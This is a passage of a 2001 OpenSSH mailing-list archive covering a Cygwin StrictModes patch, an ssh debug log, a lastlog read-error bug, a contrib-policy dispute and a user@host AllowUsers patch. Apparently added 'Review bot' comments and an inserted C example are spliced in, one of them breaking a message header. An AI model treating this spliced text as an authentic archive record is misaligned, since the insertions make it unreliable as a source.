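Review bot: in the auth-rhosts.c and auth-rsa.c hunks above (and the auth2.c hunk that follows) the added `if (check_ntsec(...))` has no braces, so the existing `if (options.strict_modes ...)` statement becomes its body by position alone; that is the intended effect, but it is fragile (any statement later inserted between the two changes the meaning) and it quietly turns StrictModes off on the 9x/ME, FAT or nontsec setups described in the message with nothing in the logs. Suggest folding the condition into the test itself, e.g. `if (options.strict_modes && check_ntsec(file)) {` with `#define check_ntsec(f) 1` for non-Cygwin builds so the #ifdef leaves the function body, and adding a debug-level log line when check_ntsec() returns 0 so an administrator can see why the ownership and mode checks were skipped.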
@@ -696,6 +696,9 @@ user_key_allowed(struct passwd *pw, Key restore_uid(); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(file)) +#endif if (options.strict_modes) { int fail = 0; char buf[1024];
--
Corinna Vinschen
Cygwin Developer
Red Hat, Inc.
mailto:vinschen at redhat.com

From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 00:19:37 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 16:19:37 +0200
Subject: authorizedkeys2 for a DHCP based client
In-Reply-To: <20010604122424.A17990@tik.ee.ethz.ch>; from ruf@tik.ee.ethz.ch on Mon, Jun 04, 2001 at 12:24:24PM +0200
References: <20010604122424.A17990@tik.ee.ethz.ch>
Message-ID: <20010604161937.D15324@folly>

my problem: you don't provide any debugging output. sorry.

On Mon, Jun 04, 2001 at 12:24:24PM +0200, Lukas Ruf wrote:
> Dear all,
>
> My Problem: I cannot get authorizedkeys2 working such that I do not need
> to supply a password.
>
> My Configuration:
> A Linux server with OpenSSH2.9p1 and a fixed IP-Address.
> A Linux client with OpenSSH2.9p1, DHCP based, so altering names, but
> the hostname is set not to be adjusted to the DHCP-address. So, the
> canonical hostname is not the same as the one which is submitted by
> ssh.
>
> My question:
> Does anyone know how to solve such a problem -- reading the man
> pages could not lead me to the solution.
>
> Thanks in advance for any help!
>
> Lukas
> --
> Lukas Ruf                  Swiss Federal Institute of Technology
> Office: ETZ-G61.2          Computer Engineering and
> Phone: +41/1/632 7312      Networks Laboratory (TIK)
> Fax: +41/1/632 1035        ETH Zentrum
> PGP 2.6: ID D20BA2ED;      Gloriastr. 35
> Fingerprint 6323 B9BC 9C8E 6563 B477 BADD FEA6 E6B7   CH-8092 Zurich

From rob at hagopian.net Tue Jun 5 00:41:44 2001
From: rob at hagopian.net (Rob Hagopian)
Date: Mon, 4 Jun 2001 10:41:44 -0400 (EDT)
Subject: authorized_keys2 directory idea
In-Reply-To: <20010604102059.B29589@folly>
Message-ID:

On Mon, 4 Jun 2001, Markus Friedl wrote:

> On Mon, Jun 04, 2001 at 12:34:18AM -0400, Rob Hagopian wrote:
> > But ssh.com v2 was around before OpenSSH... they fixed a lot of things
> > from v1 to v2, I liked that one and was disappointed to see openssh revert
> > back...
>
> i did not revert from their version.
>
> openssh is based on 1.2.12 and we improved 1.2.12.
>
> i never touched ssh.com's v2, because it's not free software.
>
> many people refused to switch to ssh.com's v2, not only because of
> the restrictive licence, but because all the configuration changed.
>
> remember, most of the ssh users are still v1 users.
>
> i'm not going to do this. and i won't support 10 different
> ways of specifying keys. this is openssh and not perl.
>
> moreover, i don't see much benefit for directories over files.

Indeed, you never did touch the code base, but you still had to add a
number of features/changes to the code to support v2. Even if you did an
entirely clean room implementation (something I happen to think is a good
idea) I'd still maintain that the ssh v2 ability to store keys as files
came (long) before openssh v2 support.

Why even cater to those people? Even the FreeBSD security notices
specifically mention that ssh v1 has inherent security problems. I don't
even see why it's turned on by default for a distribution that
superficially appears so security conscious.

> > My suggestion was only to put it into /contrib... is that OK then?
>
> depends on the size of the patch. but if we have it in contrib,
> then ppl will start to expect this from core-openssh.

I won't claim that that's completely untrue, I notice a lot of emails from
people who want stuff from the portable code base to migrate back into
core.
But I don't think it's fair, or even wise, to reject what three users
want (with the only objections coming from committers who don't want it in
the core code base) to leave it out of contrib... And a number of files in
contrib are actually required to build all the packages for at least
redhat. Since portable openssh distributes binaries of these packages
aren't those basically required to work?

Finally, if you don't want it in the code dists, what about a webpage with
contrib patches? That would even give you an indication of popularity of
these patches. Shutting out contributed code like this can only hurt the
project in the long run...
-Rob

From ruf at tik.ee.ethz.ch Tue Jun 5 00:58:57 2001
From: ruf at tik.ee.ethz.ch (Lukas Ruf)
Date: Mon, 4 Jun 2001 16:58:57 +0200
Subject: authorizedkeys2 for a DHCP based client
In-Reply-To: <20010604161937.D15324@folly>; from markus.friedl@informatik.uni-erlangen.de on Mon, Jun 04, 2001 at 16:19:37 +0200
References: <20010604122424.A17990@tik.ee.ethz.ch> <20010604161937.D15324@folly>
Message-ID: 

Pardon me: here comes the whole output when launching

  ssh -v -v komsys-pc-lr

Thanks for any help:

Lukas

-- BEGIN
OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090601f
debug1: Reading configuration data /etc/openssh/ssh_config
debug1: Applying options for *
debug1: Seeding random number generator
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: restore_uid
debug1: ssh_connect: getuid 9258 geteuid 0 anon 1
debug1: Connecting to komsys-pc-lr [129.132.66.48] port 22.
debug1: temporarily_use_uid: 9258/111 (e=0)
debug1: restore_uid
debug1: temporarily_use_uid: 9258/111 (e=0)
debug1: restore_uid
debug1: Connection established.
debug1: read PEM private key done: type DSA
debug1: read PEM private key done: type RSA
debug1: identity file /home/ruf/.ssh/identity type 0
debug2: key_type_from_name: unknown key type '-----BEGIN'
debug2: key_type_from_name: unknown key type '-----END'
debug1: identity file /home/ruf/.ssh/id_rsa type 1
debug2: key_type_from_name: unknown key type '-----BEGIN'
debug2: key_type_from_name: unknown key type '-----END'
debug1: identity file /home/ruf/.ssh/id_dsa type 2
debug1: Remote protocol version 1.99, remote software version OpenSSH_2.3.0p1
debug1: match: OpenSSH_2.3.0p1 pat ^OpenSSH_2\.3\.0
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_2.9p1
debug2: Original cipher proposal: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se
debug2: Compat cipher proposal: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour
debug2: Original cipher proposal: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se
debug2: Compat cipher proposal: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour
debug2: kex_parse_kexinit: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none
debug2: kex_parse_kexinit: none
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-dss
debug2: kex_parse_kexinit: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes128-cbc,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se
debug2: kex_parse_kexinit: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes128-cbc,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se
debug2: kex_parse_kexinit: hmac-sha1,hmac-md5,hmac-ripemd160 at openssh.com
debug2: kex_parse_kexinit: hmac-sha1,hmac-md5,hmac-ripemd160 at openssh.com
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: mac_init: found hmac-md5
debug1: kex: server->client 3des-cbc hmac-md5 none
debug2: mac_init: found hmac-md5
debug1: kex: client->server 3des-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST_OLD sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP
debug1: dh_gen_key: priv key bits set: 202/384
debug1: bits set: 517/1024
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug1: Host 'komsys-pc-lr' is known and matches the DSA host key.
debug1: Found key in /home/ruf/.ssh/known_hosts2:3
debug1: bits set: 501/1024
debug1: len 55 datafellows 53376
debug1: ssh_dss_verify: signature correct
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: done: ssh_kex2.
debug1: send SSH2_MSG_SERVICE_REQUEST
debug1: service_accept: ssh-userauth
debug1: got SSH2_MSG_SERVICE_ACCEPT
debug1: authentications that can continue: publickey,password
debug1: next auth method to try is publickey
debug1: try pubkey: /home/ruf/.ssh/id_rsa
debug2: we sent a publickey packet, wait for reply
debug1: authentications that can continue: publickey,password
debug1: try pubkey: /home/ruf/.ssh/id_dsa
debug2: we sent a publickey packet, wait for reply
debug1: authentications that can continue: publickey,password
debug2: we did not send a packet, disable method
debug1: next auth method to try is password
debug2: packet_inject_ignore: current 56
debug2: packet_inject_ignore: block 8 have 8 nb 8 mini 2 need 8
debug2: we sent a password packet, wait for reply
debug1: ssh-userauth2 successful: method password
debug1: fd 5 setting O_NONBLOCK
debug1: fd 6 IS O_NONBLOCK
debug1: channel 0: new [client-session]
debug1: channel_new: 0
debug1: send channel open 0
debug1: Entering interactive session.
debug2: callback start
debug1: client_init id 0 arg 0
debug2: tty_make_modes: ospeed 38400
debug2: tty_make_modes: ispeed 38400
debug2: tty_make_modes: 1 3
debug2: tty_make_modes: 2 28
debug2: tty_make_modes: 3 127
debug2: tty_make_modes: 4 21
debug2: tty_make_modes: 5 4
debug2: tty_make_modes: 6 0
debug2: tty_make_modes: 7 0
debug2: tty_make_modes: 8 17
debug2: tty_make_modes: 9 19
debug2: tty_make_modes: 10 26
debug2: tty_make_modes: 12 18
debug2: tty_make_modes: 13 23
debug2: tty_make_modes: 14 22
debug2: tty_make_modes: 18 15
debug2: tty_make_modes: 30 0
debug2: tty_make_modes: 31 0
debug2: tty_make_modes: 32 0
debug2: tty_make_modes: 33 0
debug2: tty_make_modes: 34 0
debug2: tty_make_modes: 35 0
debug2: tty_make_modes: 36 1
debug2: tty_make_modes: 37 0
debug2: tty_make_modes: 38 1
debug2: tty_make_modes: 39 0
debug2: tty_make_modes: 40 0
debug2: tty_make_modes: 41 0
debug2: tty_make_modes: 50 1
debug2: tty_make_modes: 51 1
debug2: tty_make_modes: 52 0
debug2: tty_make_modes: 53 1
debug2: tty_make_modes: 54 1
debug2: tty_make_modes: 55 1
debug2: tty_make_modes: 56 0
debug2: tty_make_modes: 57 0
debug2: tty_make_modes: 58 0
debug2: tty_make_modes: 59 1
debug2: tty_make_modes: 60 1
debug2: tty_make_modes: 61 1
debug2: tty_make_modes: 62 0
debug2: tty_make_modes: 70 1
debug2: tty_make_modes: 71 0
debug2: tty_make_modes: 72 1
debug2: tty_make_modes: 73 0
debug2: tty_make_modes: 74 0
debug2: tty_make_modes: 75 0
debug2: tty_make_modes: 90 1
debug2: tty_make_modes: 91 1
debug2: tty_make_modes: 92 0
debug2: tty_make_modes: 93 0
debug1: Requesting X11 forwarding with authentication spoofing.
debug1: channel request 0: shell
debug2: callback done
debug1: channel 0: open confirm rwindow 0 rmax 16384
debug2: channel 0: rcvd adjust 32768
Last login: Mon Jun 4 16:55:51 2001 from uccellina
.tcshrc.user sourced
.tcshrc.Linux sourced
.tcshrc.LaTex sourced
.tcshrc successfully sourced
komsys-pc-lr]2;ruf at komsys-pc-lr:~:~!51> exit
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: channel 0: rcvd eof
debug1: channel 0: output open -> drain
debug1: channel 0: rcvd close
debug1: channel 0: input open -> closed
debug1: channel 0: close_read
debug2: channel 0: no data after CLOSE
debug1: channel 0: obuf empty
debug1: channel 0: output drain -> closed
debug1: channel 0: close_write
debug1: channel 0: send close
debug1: channel 0: is dead
debug1: channel_free: channel 0: status: The following connections are open:
  #0 client-session (t4 r0 i8/0 o128/0 fd -1/-1)
debug1: channel_free: channel 0: dettaching channel user
Connection to komsys-pc-lr closed.
debug1: Transferred: stdin 0, stdout 0, stderr 36 bytes in 6.7 seconds
debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 5.4
debug1: Exit status 0
-- END

On Mon, 04 Jun 2001, Markus Friedl wrote:
> my problem: you don't provide any debugging output. sorry.
>
> On Mon, Jun 04, 2001 at 12:24:24PM +0200, Lukas Ruf wrote:
> > Dear all,
> >
> > My Problem: I cannot get authorizedkeys2 working such that I do not need
> > to supply a password.
> >
> > My Configuration:
> > A Linux server with OpenSSH2.9p1 and a fixed IP-Address.
> > A Linux client with OpenSSH2.9p1, DHCP based, so altering names, but
> > the hostname is set not to be adjusted to the DHCP-address. So, the
> > canonical hostname is not the same as the one which is submitted by
> > ssh.
> >
> > My question:
> > Does anyone know how to solve such a problem -- reading the man
> > pages could not lead me to the solution.
> >
> > Thanks in advance for any help!
> > 
> > Lukas
> > -- 
> > Lukas Ruf                     Swiss Federal Institute of Technology
> > Office: ETZ-G61.2             Computer Engineering and
> > Phone: +41/1/632 7312         Networks Laboratory (TIK)
> > Fax: +41/1/632 1035           ETH Zentrum
> > PGP 2.6: ID D20BA2ED;         Gloriastr. 35
> > Fingerprint 6323 B9BC 9C8E 6563 B477 BADD FEA6 E6B7   CH-8092 Zurich

-- 
Lukas Ruf                     Swiss Federal Institute of Technology
Office: ETZ-G61.2             Computer Engineering and
Phone: +41/1/632 7312         Networks Laboratory (TIK)
Fax: +41/1/632 1035           ETH Zentrum
PGP 2.6: ID D20BA2ED;         Gloriastr. 35
Fingerprint 6323 B9BC 9C8E 6563 B477 BADD FEA6 E6B7   CH-8092 Zurich

From patl at curl.com Tue Jun 5 01:01:15 2001
From: patl at curl.com (Patrick J. LoPresti)
Date: 04 Jun 2001 11:01:15 -0400
Subject: OpenSSH 2.9p1: lastlog_get_entry() should be more careful
Message-ID: 

In OpenSSH 2.9p1, the function loginrec.c:lastlog_get_entry() looks like this:

    int
    lastlog_get_entry(struct logininfo *li)
    {
        struct lastlog last;
        int fd;

        if (lastlog_openseek(li, &fd, O_RDONLY)) {
            if (atomicio(read, fd, &last, sizeof(last)) != sizeof(last)) {
                log("lastlog_get_entry: Error reading from %s: %s",
                    LASTLOG_FILE, strerror(errno));
                return 0;
            } else {
                lastlog_populate_entry(li, &last);
                return 1;
            }
        } else {
            return 0;
        }
    }

On Linux (at least version 2.2.19), the call to lastlog_openseek() can succeed even when the /var/log/lastlog file is short (e.g., 0 bytes). Subsequent calls to read() on the file descriptor return zero (EOF). Consequently, the call to atomicio in the function above returns zero, causing OpenSSH to log a bogus error message by examining a bogus errno value.

I suggest that the call to atomicio() be checked to see if it returns zero, with no error message generated for this case. That is, I suggest the function be rewritten something like this:

    int
    lastlog_get_entry(struct logininfo *li)
    {
        struct lastlog last;
        int fd;

        if (lastlog_openseek(li, &fd, O_RDONLY)) {
            int ret = atomicio(read, fd, &last, sizeof(last));
            if (ret == sizeof(last)) {
                lastlog_populate_entry(li, &last);
                return 1;
            } else if (ret == 0) {
                return 0;
            } else {
                log("lastlog_get_entry: Error reading from %s: %s",
                    LASTLOG_FILE, strerror(errno));
                return 0;
            }
        } else {
            return 0;
        }
    }

The above is just for illustration; it is still not quite correct. Strictly speaking, you should not examine errno unless atomicio() returns a negative value, because a short read will not set errno either.

 - Pat

From dveeravalli at telica.com Tue Jun 5 01:10:13 2001
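Following up on Pat's lastlog_get_entry() post above, an added example (not code from the post or from OpenSSH) that separates the three outcomes a fixed-size record read can have: EOF before the first byte, a record cut short, and a failing read() call, with errno consulted only in the last case. The record layout (struct fake_lastlog), the temporary file built by make_file() and the names read_record(), lastlog_get_entry_checked() and lastlog_scenario() are all assumptions made here; the scenarios replay the situations the post describes (a 0-byte lastlog, a truncated file, a present record, a bad descriptor).

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Constructed stand-in for the fixed-size struct lastlog record
 * (hypothetical field sizes; only the fixed length matters here). */
struct fake_lastlog {
    int  ll_time;
    char ll_line[32];
    char ll_host[256];
};

enum read_result { READ_OK, READ_EOF, READ_SHORT, READ_ERROR };

/* Read exactly len bytes from fd, keeping apart the outcomes the original
 * lastlog_get_entry() lumped together: EOF before the first byte (no record
 * for this uid yet), a record cut short by the end of file, and a failing
 * read(). errno is meaningful only for READ_ERROR. */
enum read_result read_record(int fd, void *buf, size_t len)
{
    size_t got = 0;

    while (got < len) {
        ssize_t n = read(fd, (char *)buf + got, len - got);
        if (n < 0) {
            if (errno == EINTR)
                continue;          /* interrupted: retry */
            return READ_ERROR;     /* errno was set by read() */
        }
        if (n == 0)
            return got == 0 ? READ_EOF : READ_SHORT;
        got += (size_t)n;
    }
    return READ_OK;
}

/* The decision Pat's post asks for: only a real read error consults errno;
 * an absent record is silent and a truncated one is reported without it.
 * Returns 1 when a complete record was read, 0 otherwise. */
int lastlog_get_entry_checked(int fd, struct fake_lastlog *out)
{
    switch (read_record(fd, out, sizeof *out)) {
    case READ_OK:
        return 1;
    case READ_EOF:
        return 0;
    case READ_SHORT:
        fprintf(stderr, "lastlog_get_entry: truncated record\n");
        return 0;
    default:
        fprintf(stderr, "lastlog_get_entry: read: %s\n", strerror(errno));
        return 0;
    }
}

/* Anonymous temporary file holding nbytes of constructed filler, returned as
 * a descriptor positioned at offset pos, or -1 on failure. */
static int make_file(size_t nbytes, off_t pos)
{
    FILE *fp = tmpfile();
    int fd;

    if (fp == NULL)
        return -1;
    for (size_t i = 0; i < nbytes; i++)
        fputc('x', fp);
    fflush(fp);
    fd = dup(fileno(fp));  /* keeps the unlinked file alive after fclose() */
    fclose(fp);
    if (fd >= 0 && lseek(fd, pos, SEEK_SET) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

int lastlog_last_errno;  /* errno seen by the most recent lastlog_scenario() */

/* The situations from the post, replayed against a constructed lastlog file:
 * 0: empty file (the 0-byte /var/log/lastlog)  -> READ_EOF
 * 1: file shorter than one record              -> READ_SHORT
 * 2: three records, positioned on the second   -> READ_OK
 * 3: invalid descriptor                        -> READ_ERROR, errno == EBADF */
enum read_result lastlog_scenario(int which)
{
    struct fake_lastlog rec;
    size_t sz = sizeof rec;
    int fd = -1;
    enum read_result r;

    if (which == 0) fd = make_file(0, 0);
    else if (which == 1) fd = make_file(sz / 2, 0);
    else if (which == 2) fd = make_file(3 * sz, (off_t)sz);
    errno = 0;
    r = read_record(fd, &rec, sz);
    lastlog_last_errno = errno;
    if (fd >= 0) close(fd);
    return r;
}
```

The point of the four-way result is that a caller can decide per case: an absent record is the normal first-login situation and needs no log line, a truncated record points at a damaged or concurrently rewritten file, and only a negative read() return leaves a trustworthy errno behind.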
From: dveeravalli at telica.com (Deepa Nemmili Veeravalli)
Date: Mon, 4 Jun 2001 11:10:13 -0400
Subject: Porting Openssh2 to Lynx
Message-ID: <7AC90049E901D511A8CA009027289AEA8EBDA5@wench>

Has it ever been tried to port OpenSSH2 to Lynx? Are there any patches available for the same? If not, will it be possible for the OpenSSH project group to do the same?

Thanks for any help,
Deepa.

From mouring at etoh.eviladmin.org Tue Jun 5 01:13:04 2001
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Mon, 4 Jun 2001 10:13:04 -0500 (CDT)
Subject: authorized_keys2 directory idea
In-Reply-To: 
Message-ID: 

On Mon, 4 Jun 2001, Rob Hagopian wrote:

> On Mon, 4 Jun 2001, Markus Friedl wrote:
> [..]
> Why even cater to those people? Even the FreeBSD security notices
> specifically mention that ssh v1 has inherent security problems. I don't
> even see why it's turned on by default for a distribution that
> superficially appears so security conscious.
> 

Let's do a small reality check. OpenSSH has had complete v2 compatibility for how long now? 8 months? No.. 6 months? no.. 5 months? no.. Try about a month.

Let's do another reality check. How many people are still using v1? Still over 5x the user base of v2.

THIS IS TOTALLY STUPID. v2 is the default for all transactions as of v2.9. Which means OpenSSH will only step down if (a) the user tells the software to, (b) the v2 keys don't exist, and (c) the remote side can not speak v2. IMNSHO this is the correct behavior for at least another year. Maybe by that time we can look at the v2 and v1 stats and consider disabling v1.

Migration paths are required evils. Thus is the reason Markus has taken a painful amount of time writing all that compatibility code for v1. And thus is the reason why ssh.com is a pain in the ass.

> > > My suggestion was only to put it into /contrib... is that OK then?
> > 
> > depends on the size of the patch. but if we have it in contrib,
> > then ppl will start to expect this from core-openssh.
> 
> I won't claim that that's completely untrue, I notice a lot of emails from
> people who want stuff from the portable code base to migrate back into
> core. But I don't think it's fair, or even wise, to reject what three

What portable code? OpenSSH portable should implement no 'new' features outside what is required to get to compile and run.
We attempt to bring in 'universal' changes back to the OpenBSD tree when we feel it is right, but I see no reason why (Example) IRIX's overly complex authentication code needs to be put into the clean OpenBSD tree.

> users want (with the only objections coming from committers who don't want
> it in the core code base) to leave it out of contrib...
> 

I'll step up and state "No I do not feel that it's any easier to track a single file vs multiple little files. Therefore I do not wish to see such code added to the core tree." If that makes any difference. I'm mainly on the Portable side of the development (even if extremely busy and quiet lately).

> And a number of files in contrib are actually required to build all the
> packages for at least redhat. Since portable openssh distributes binaries
> of these packages aren't those basically required to work?
> 

You are trying to extend logic that is not correct. In all but a few cases in contrib/, the files are there to support the portable version directly. You directly need contrib/redhat/ or else you have authentication issues if you wish to use pam. This is nothing like "I want feature XYZ, but no one wants to commit it therefore I demand it be in contrib/."

> Finally, if you don't want it in the code dists, what about a webpage with
> contrib patches? That would even give you an indication of popularity of
> these patches. Shutting out contributed code like this can only hurt the
> project in the long run...
> -Rob

Requiring people like myself who help keep the OpenSSH portable tree alive to maintain all those code snippets will hurt the project even more. Because in the end it's the OpenBSD and OpenSSH Portable group stuck with dragging this contrib code forward to each new release. Not the original author who has long since left the mailing list and potentially their job and no longer cares about the patch they submitted.
I look at contrib/ diff files as yet another thing a user will bitch about if it does not apply cleanly. A 'feature' they would have never even dreamed of had the *.diff file not existed. And one more headache to have to worry about during crunch time in the release process. Hell, at times I've almost removed contrib/chroot.diff because it was not kept up.

Anyways, I've had enough of this. =) I have real work that needs to be done.

- Ben

From dwd at bell-labs.com Tue Jun 5 01:34:42 2001
From: dwd at bell-labs.com (Dave Dykstra)
Date: Mon, 4 Jun 2001 10:34:42 -0500
Subject: Disabling Password-based auth? (was RE: recent breakins)
In-Reply-To: ; from tomh@po.crl.go.jp on Sat, Jun 02, 2001 at 04:26:54PM +0900
References: <20010601161034.D16295@faui02.informatik.uni-erlangen.de>
Message-ID: <20010604103442.A25508@lucent.com>

On Sat, Jun 02, 2001 at 04:26:54PM +0900, Tom Holroyd wrote:
...
> Dykstra's problem can be solved, too. As he mentioned, a clever trojan
> could still be built -- it wouldn't get the password but it could still
> insert commands into the outgoing channel that would backdoor the user's
> account, or forward the established connection to an active attacker; BUT,
> if the authentication used forwarded SRP, _and_ if the session keys were
> switched to the new shared secret generated as a byproduct of the SRP
> authentication, then the MITM would get zilch.

I can't think of a fundamental reason why that wouldn't work; I would look at the MITM host at that point like any untrusted network element such as a router. However, it seems to me that it would be a rather drastic change to the SSH implementation and protocol. You can't simply change the session key of the existing session because you need to be able to revert back to it when the forwarded session completes. Or, perhaps the forwarded session will be run in the background and multiple other forwarded sessions started in parallel. I'm not very familiar with the SSH 2 protocol specification, but as far as I know there's no precedent for keeping more than one encrypted session going to different servers in the same client. I don't think it's worth doing -- people just shouldn't connect from lesser trusted hosts to more trusted hosts.

- Dave Dykstra

From tridge at samba.org Tue Jun 5 01:34:25 2001
From: tridge at samba.org (Andrew Tridgell)
Date: Mon, 4 Jun 2001 08:34:25 -0700 (PDT)
Subject: [patch] user@host in AllowUsers
Message-ID: <20010604153425.66E46427C@lists.samba.org>

This is a port of a patch I contributed to ssh 1.2.23 in May 1998. I have missed the functionality after moving to OpenSSH so I have updated the patch and hope OpenSSH might accept it.

The patch allows sshd_config to have lines like:

    AllowUsers root@localhost
    AllowUsers tridge@*
    AllowUsers guest@192.168.2.*
    DenyUsers badguy@*

etc.

I found this useful for restricting users to only login from hostnames that they pre-arranged with me.

Patch is against current cvs.

Cheers, Tridge

Index: auth.c
===================================================================
RCS file: /cvs/openssh_cvs/auth.c,v
retrieving revision 1.28
diff -u -r1.28 auth.c
--- auth.c 2001/03/19 22:15:57 1.28
+++ auth.c 2001/06/04 15:20:52
@@ -45,6 +45,56 @@ extern ServerOptions options; /* + match a hostname or an IP to a pattern. If the pattern only contains digits and '.' + then match as a IP, otherwise match as a hostname + */ +static int match_host(const char *host, const char *ip, const char *pattern) +{ + const char *p; + for (p=pattern; *p; p++) { + if (!strchr("0123456789*?.", *p)) { + /* treat as a hostname */ + return match_pattern(host, pattern); + } + } + return match_pattern(ip, pattern); +} + + +/* this combines the effect of match_pattern on a username, hostname + and IP address. If the pattern contains a @ then the part preceding + the @ is checked against the username. The part after the @ is + checked against the hostname and IP address. If no @ is found then + a normal match_pattern is done against the username + + This is more useful than just a match_pattern as it allows you to + specify exactly what users are alowed to login from what hosts + (tridge, May 1998) +*/ +static int match_user(const char *user, const char *host, const char *ip, + const char *pattern) +{ + int ret; + char *p2; + char *p; + + p = strchr(pattern,'@'); + + if (!p) return match_pattern(user, pattern); + + p2 = xstrdup(pattern); + p = strchr(p2, '@'); + + *p = 0; + + ret = match_pattern(user,p2) && match_host(host, ip, p + 1); + + xfree(p2); + return ret; +} + + +/* * Check if the user is allowed to log in via ssh. If user is listed * in DenyUsers or one of user's groups is listed in DenyGroups, false * will be returned. If AllowUsers isn't empty and user isn't listed 
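Review bot: match_host() in the first hunk sends a pattern to match_pattern(host, ...) whenever it contains any character outside "0123456789*?.", and that host string comes from get_canonical_hostname(options.reverse_mapping_check), so a hostname-form entry such as guest@*.example.org is only as trustworthy as the connecting client's reverse DNS unless reverse mapping checks are enabled; the block comment above match_user() should say so and point administrators at numeric patterns (matched against get_remote_ipaddr()) when the host part is meant as an access control rather than a convenience. A smaller point: a pattern with a trailing '@' hands match_host() the empty string as its host pattern, so whether it can ever match depends on how match_pattern() treats an empty pattern; rejecting such entries when sshd_config is parsed would be clearer than failing silently at login time.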
@@ -103,14 +153,18 @@ /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { + const char *hostname = get_canonical_hostname(options.reverse_mapping_check); + const char *ipaddr = get_remote_ipaddr(); for (i = 0; i < options.num_deny_users; i++) - if (match_pattern(pw->pw_name, options.deny_users[i])) + if (match_user(pw->pw_name, hostname, ipaddr, options.deny_users[i])) return 0; } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { + const char *hostname = get_canonical_hostname(options.reverse_mapping_check); + const char *ipaddr = get_remote_ipaddr(); for (i = 0; i < options.num_allow_users; i++) - if (match_pattern(pw->pw_name, options.allow_users[i])) + if (match_user(pw->pw_name, hostname, ipaddr, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ if (i >= options.num_allow_users) Index: sshd.8 =================================================================== RCS file: /cvs/openssh_cvs/sshd.8,v retrieving revision 1.78 diff -u -r1.78 sshd.8 --- sshd.8 2001/05/04 22:38:43 1.78 +++ sshd.8 2001/06/04 15:20:54 @@ -330,6 +330,9 @@ wildcards in the patterns. Only user names are valid; a numerical user ID isn't recognized. By default login is allowed regardless of the user name. +If the pattern takes the form USER at HOST then USER and HOST +are separately checked, allowing you to restrict logins to particular +users from particular hosts. .Pp .It Cm Banner In some jurisdictions, sending a warning message before authentication From gert at greenie.muc.de Tue Jun 5 01:50:32 2001 
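Review bot: in the second auth.c hunk both the DenyUsers and AllowUsers blocks now call get_canonical_hostname() on every connection, even when no configured pattern contains an '@', which adds a reverse DNS lookup (with its latency and failure modes) to a path the old match_pattern() code never touched; resolve it lazily, only when match_user() actually finds an '@', or at least compute hostname and ipaddr once before the two loops instead of repeating the two declarations in each block.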
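Review bot: the sshd.8 hunk says USER and HOST are checked separately but not what HOST is compared against: per match_host() in auth.c a pattern made only of digits, '.', '*' and '?' is matched against the client's IP address and anything else against the reverse-resolved hostname, which is exactly what an administrator needs in order to judge how strong the restriction is. Suggest extending the added sentence along the lines of: "HOST may be a hostname pattern or a numeric IP address pattern; hostname patterns depend on the reverse DNS of the connecting client."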
From: gert at greenie.muc.de (Gert Doering)
Date: Mon, 4 Jun 2001 17:50:32 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from Jason Stone on Mon, Jun 04, 2001 at 01:23:15AM -0700
References: <200106040329.f543T5n24299@cvs.openbsd.org>
Message-ID: <20010604175032.A26171@greenie.muc.de>

Hi,

On Mon, Jun 04, 2001 at 01:23:15AM -0700, Jason Stone wrote:
